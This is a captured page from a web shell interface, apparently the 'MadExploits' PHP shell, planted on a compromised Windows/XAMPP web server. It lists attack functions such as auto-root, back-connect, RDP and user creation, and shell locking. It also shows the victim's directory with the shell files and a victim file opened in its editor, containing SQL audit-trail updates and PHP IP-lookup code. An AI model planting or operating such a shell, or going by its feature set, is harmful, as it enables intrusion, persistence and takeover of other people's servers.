Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
htdocs /
edgpens /
patch /
[ HOME SHELL ]
Name
Size
Permission
Action
240205
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
odbc.php
24.03
KB
-rw-rw-rw-
upd_240205.txt
3.12
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upd_240205.txt
alter table audit_trail add ( idRoles bigint(20), idSubRoles bigint(20), ipaddress varchar(15), register_user char(1) ); alter table audit_trail add register_user char(1); update audit_trail set register_user='Y' WHERE register_user is null; update audit_trail set register_user='N',idRoles='1',idSubRoles='0' WHERE descr like '%Self-Update%' and idRoles is null; update audit_trail set register_user='N',idRoles='1',idSubRoles='0' WHERE descr in ('Agent Email Confirmation','Password Reset By Recovery Token','Agent Self Registration') and running_sql like '%user_register%' and idRoles is null; update audit_trail set register_user='N',idRoles='1',idSubRoles='0' WHERE descr in ('Agent Email Confirmation','Agent Self Registration') and idRoles is null; update audit_trail a left join user_list b on b.idUser=a.idUser and b.idRoles!=1 set a.idRoles=b.idRoles,a.idSubRoles=b.idSubRoles where b.idRoles!=1 and a.register_user='Y' and a.descr NOT LIKE '%sistem%' and a.idRoles is null; update audit_trail a left join user_list b on b.idUser=a.idUser and b.idRoles=1 set a.idRoles=b.idRoles,a.idSubRoles=b.idSubroles where b.idUser is not null and a.register_user='Y' and a.descr like '%APPLICATION UPDATE%' and a.idRoles is null; update audit_trail a left join user_list b on b.idUser=a.idUser set a.idRoles=b.idRoles,a.idSubRoles=b.idSubRoles WHERE a.running_sql like '%user_list%' and a.idRoles is null and a.register_user='Y'; update audit_trail a left join user_list b on b.idUser=a.idUser set a.idRoles=b.idRoles,a.idSubRoles=b.idSubRoles WHERE a.descr not in ('Login Sistem','Log Out Sistem') and a.register_user!='N' and a.idRoles is null; update audit_trail a left join user_list b ON b.idUser = a.idUser and // Function to get the client ip address function get_client_ip_env() { $ipaddress = ''; if (getenv('HTTP_CLIENT_IP')) $ipaddress = getenv('HTTP_CLIENT_IP'); else if(getenv('HTTP_X_FORWARDED_FOR')) $ipaddress = getenv('HTTP_X_FORWARDED_FOR'); else if(getenv('HTTP_X_FORWARDED')) $ipaddress = getenv('HTTP_X_FORWARDED'); else if(getenv('HTTP_FORWARDED_FOR')) $ipaddress = getenv('HTTP_FORWARDED_FOR'); else if(getenv('HTTP_FORWARDED')) $ipaddress = getenv('HTTP_FORWARDED'); else if(getenv('REMOTE_ADDR')) $ipaddress = getenv('REMOTE_ADDR'); else $ipaddress = 'UNKNOWN'; return $ipaddress; } // Function to get the client ip address function get_client_ip_server() { $ipaddress = ''; if ($_SERVER['HTTP_CLIENT_IP']) $ipaddress = $_SERVER['HTTP_CLIENT_IP']; else if($_SERVER['HTTP_X_FORWARDED_FOR']) $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR']; else if($_SERVER['HTTP_X_FORWARDED']) $ipaddress = $_SERVER['HTTP_X_FORWARDED']; else if($_SERVER['HTTP_FORWARDED_FOR']) $ipaddress = $_SERVER['HTTP_FORWARDED_FOR']; else if($_SERVER['HTTP_FORWARDED']) $ipaddress = $_SERVER['HTTP_FORWARDED']; else if($_SERVER['REMOTE_ADDR']) $ipaddress = $_SERVER['REMOTE_ADDR']; else $ipaddress = 'UNKNOWN'; return $ipaddress; }
Close